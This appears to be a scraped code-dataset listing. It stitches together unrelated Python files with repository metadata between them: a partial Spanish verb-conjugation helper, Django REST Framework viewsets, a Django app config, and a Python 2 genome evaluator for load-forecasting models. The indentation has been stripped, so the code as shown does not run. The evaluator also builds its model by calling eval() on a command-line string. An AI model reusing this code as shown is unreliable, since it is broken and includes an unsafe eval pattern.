conN = ["somos","estamos", "vamos","venimos", "tenemos", "hacemos", "decimos","llamamos", "cumplimos"]
w = ""
for x in palabras:
for y in range(0,len(verb)):
if(x == verb[y]):
if(pron == "él" or pron == "ella" or pron == "usted" or pron == "mi" or pron == "su"):
w = conjEEU[y]
elif(pron == "yo"):
w = conjY[y]
elif(pron == "ustedes" or pron == "sus"):
w = conUs[y]
else:
w = conN[y]
return w
def sintactico(palabras):
n = 0
res = []
for x in range(0,len(palabras)):
w = ""
if(palabras[x] == " "):
for y in range(n,x):
if(palabras[y]=="10" and palabras[y+1]!=" "):
s = int(10)+int(palabras[y+1])
k = str(s)
w += k
elif(palabras[y-1]=="10"):
"suma"
else:
if(palabras[y]!=w or w.isdigit()):
w += palabras[y]
n = x +1
res += [w]
w = ""
return res
| [
"[email protected]"
]
| |
e6215762208ab16d0230d27ae2bd2259e021ac48 | 830837f1ca1a4d090f9979f1d448017cbf88065c | /tutorial/quickstart/views.py | eede40c2e82a5d2cee4c62f62a4c009e8e4fd883 | []
| no_license | arshadansari27/django-angular | 3bd32a937cc6f0977d00fb7fe93203011aec786e | 558472df5071dc93973173ae83aefbac0eb4fdc4 | refs/heads/master | 2016-08-12T03:34:54.079002 | 2015-11-26T08:20:36 | 2015-11-26T08:20:36 | 46,878,628 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 610 | py | from django.contrib.auth.models import User, Group
from rest_framework import viewsets
from tutorial.quickstart.serializers import UserSerializer, GroupSerializer
from django.shortcuts import render
class UserViewSet(viewsets.ModelViewSet):
"""
API endpoint that allows users to be viewed or edited.
"""
queryset = User.objects.all().order_by('-date_joined')
serializer_class = UserSerializer
class GroupViewSet(viewsets.ModelViewSet):
"""
API endpoint that allows groups to be viewed or edited.
"""
queryset = Group.objects.all()
serializer_class = GroupSerializer
| [
"[email protected]"
]
| |
fd08376b9c08c60bb8b11cd622e7317f4e26a932 | 722b35b7617e5b715b964419eb81de1c8958c4d1 | /locacoes/apps.py | 4e2edd5bf82f1453d7cc05d7206ffe50fae2a85a | []
| no_license | gugajung/StarVideo | 83dad32e256ce4335debc9df27be9b75e9cd32ce | 44bab79c5bc3abb3d27d519bc13ece304f28672b | refs/heads/master | 2020-09-27T03:43:56.327484 | 2019-11-19T18:19:03 | 2019-11-19T18:19:03 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 121 | py | """
Apps: App 'locacoes'
"""
from django.apps import AppConfig
class LocacoesConfig(AppConfig):
name = 'locacoes'
| [
"[email protected]"
]
| |
dcd0da39888cc54780f3269f3b421d663fbe0369 | 12d0f444452d3b2218cd270756283a0463d3e796 | /sg/models/genome_evaluator.py | ebfcee9c68636525d62cd1370f29350bfbce32e0 | []
| no_license | dal3006/load_forecasting-1 | 107ffdbb4648989ba85fa8ba39ecdddb9c24ddd1 | d324a711a1a0c7ccd9587e0ecf9988a12214a1a3 | refs/heads/master | 2023-03-17T07:44:43.487863 | 2015-03-12T15:24:37 | 2015-03-12T15:24:37 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,873 | py | """Use this program to evaluate one genome at a time, read from standard
input."""
import sys
import ast
import traceback
import random
import matplotlib.pyplot as plt
import sg.utils.pyevolve_utils as pu
import sg.utils
import ga
import sg.data.sintef.userloads as ul
import load_prediction as lp
from load_prediction_ar import *
from load_prediction_ar24 import *
from load_prediction_arima import *
from load_prediction_dshw import *
from load_prediction_esn import *
from load_prediction_esn24 import *
try:
from load_prediction_CBR import *
from load_prediction_wavelet import *
from load_prediction_wavelet24 import *
except ImportError:
print >>sys.stderr, "Genome evaluator can't import CBR/wavelet modules, probably some of the dependencies are not installed."
options = None
def get_options():
global options
parser = lp.prediction_options()
parser = lp.ga_options(parser)
parser = lp.data_options(parser)
parser.add_option("--model", dest="model", help="The model class that the genomes instantiate", default=None)
parser.add_option("--test-set", dest="test_set", action="store_true",
help="Test the genomes on the test set, rather than on the training set", default=False)
parser.add_option("--plot", dest="plot", action="store_true",
help="Make a plot (in combination with --test-set)", default=False)
(options, args) = parser.parse_args()
lp.options = options
if options.model is None:
print >>sys.stderr, "Model argument is required."
sys.exit(1)
def read_next_genome_list():
print "Enter genome to be evaluated: "
line = sys.stdin.readline()
if line == "":
print "End of input, exiting."
sys.exit(0)
return ast.literal_eval(line)
def next_indiv():
gl = read_next_genome_list()
genome = pu.AllelesGenome()
genome.setInternalList(gl)
genome.setParams(num_trials=options.num_trials)
return genome
def gene_test_loop(model):
while sys.stdin:
ga._model = model
indiv = next_indiv()
if options.test_set:
print "Evaluating genome on test set: ", indiv[:]
sys.stdout.flush()
try:
(target, predictions) = lp.parallel_test_genome(indiv, model) if options.parallel else lp.test_genome(indiv, model)
except Exception, e:
print >>sys.stderr, "Exception raised, failed to evaluate genome."
tb = " " + traceback.format_exc(limit=50)[:-1]
print >>sys.stderr, tb.replace("\n", "\n ")
continue
error = sg.utils.concat_and_calc_error(predictions, target, model.error_func)
print "Error on test phase: {}".format(error)
if options.plot:
sg.utils.plot_target_predictions(target, predictions)
plt.show()
else:
print "Evaluating genome on training set: ", indiv[:]
sys.stdout.flush()
fitness = ga._fitness(indiv)
print "Fitness:", fitness
if fitness != 0:
print "Error:", ga._fitness_to_error(fitness)
else:
print "Error not calculated for 0 fitness."
def run():
"""."""
get_options()
prev_handler = np.seterrcall(lp.float_err_handler)
prev_err = np.seterr(all='call')
np.seterr(under='ignore')
random.seed(options.seed)
np.random.seed(options.seed)
model_creator = eval(options.model + "(options)")
model = model_creator.get_model()
lp._print_sim_context(model._dataset)
print "Number of training sequences: %d" % options.num_trials
print "Start days of training sequences:", model._dataset.train_periods_desc
gene_test_loop(model)
ul.tempfeeder_exp().close()
if __name__ == "__main__":
run()
| [
"[email protected]"
]
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.